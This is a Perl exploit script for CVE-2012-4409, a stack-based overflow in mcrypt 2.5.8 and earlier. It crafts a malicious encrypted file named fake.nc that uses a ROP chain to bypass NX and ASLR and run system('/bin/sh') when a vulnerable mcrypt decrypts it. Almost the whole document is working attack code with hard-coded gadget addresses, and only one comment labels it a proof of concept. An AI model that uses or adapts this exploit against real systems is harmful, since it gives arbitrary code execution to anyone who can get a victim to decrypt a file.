mcrypt <= 2.5.8 Stack Based Overflow

                                                #!/usr/bin/perl

# Title          : mcrypt <= 2.5.8 STACK based overflow
# Date           : 23/11/2012
# Exploit Author : Tosh
# CVE            : CVE-2012-4409 
# Patch          : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on      : Archlinux 3.6.6-1, without SSP


# This script exploit a stack based overflow in mcrypt <= 2.5.8.
# It bypass NX and ASLR protections, but no SSP.

# This exploit craft a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more
# informations.

# Payload must be adjusted on others plateforms, here is just a Proof of Concept :) 

use strict;
use warnings;

my $filename = 'fake.nc';

my $file;
my $payload;

print "[+] Build payload.\n";
$payload = payload();

print "[+] Build file.\n";
$file = build_file($payload);

print "[+] Writing $filename.\n";
write_file();

print "[+] DONE.\n";

sub write_file {
    die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename);
    print F $file;
    close F;
}

sub build_file {
# magic 
    $file .= "\x00m\x03";

# flags
    $file .= pack('C', 1 << 6);

# algorithm
    $file .= "H\@Ck3d\x00";

# keysize
    $file .= pack('S', 0xdead);

# mode
    $file .= "h\@cK3d\x00";

# keymode
    $file .= "H\@CK3D\x00";

# sflags
    $file .= "\xff";

# payload
    $file .= $_[0];
    
    return $file;
}

sub payload {
    my $saved_eip_off = 0x71;       # Buffer len for overwrite saved EIP
    my $v_local_1     = 0x0805b000; # Local variable 1 overwriten
    my $v_local_2     = 0x08048007; # Local variable 2 overwriten
    my $ret_sled      = 5;          # Offset between saved EIP and local variables
    my $strcpy_plt    = 0x080499f0; # strcpy@plt address
    my $fopen64_got   = 0x0805b1c8; # fopen64 got entry
    my $system_off    = 0xfffd6b30; # fopen64 - system
    my $w_mem         = 0x0805b000; # writable memory, without ASLR

    my $pop2_ret      = 0x08055a63; # pop; pop; ret
    my $ret           = 0x0805a5ed; # ret
    my $pop_ebx       = 0x08056186; # pop ebx; ret
    my $pop_edi       = 0x08053460; # pop edi; ret
    my $xchg_eax      = 0x080517a4; # xchg eax, edi; ret
    my $add_eax       = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret
    my $call_eax      = 0x0804b357; # call eax; leave; ret

    my $payload;

    $payload .= "A"x$saved_eip_off;
    $payload .= pack('L', $ret) x $ret_sled;
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $v_local_1);
    $payload .= pack('L', $v_local_2);

# Copy  "/bin/" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x00);
    $payload .= pack('L', 0x08057fc2); 

# Copy "sh" + "\x00" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x05);
    $payload .= pack('L', 0x08048bab);

# Calc system() address with fopen64 GOT entry
    $payload .= pack('L', $pop_ebx);
    $payload .= pack('L', $fopen64_got + 0x2776e73c);

    $payload .= pack('L', $pop_edi);
    $payload .= pack('L', $system_off);

    $payload .= pack('L', $xchg_eax);

    $payload .= pack('L', $add_eax);
    $payload .= "HaCk";

# Call system("/bin/sh")
    $payload .= pack('L', $call_eax);
    $payload .= pack('L', $w_mem);

    die("[-] Payload too long !\n") if(length $payload > 0xfe);
    return $payload;
}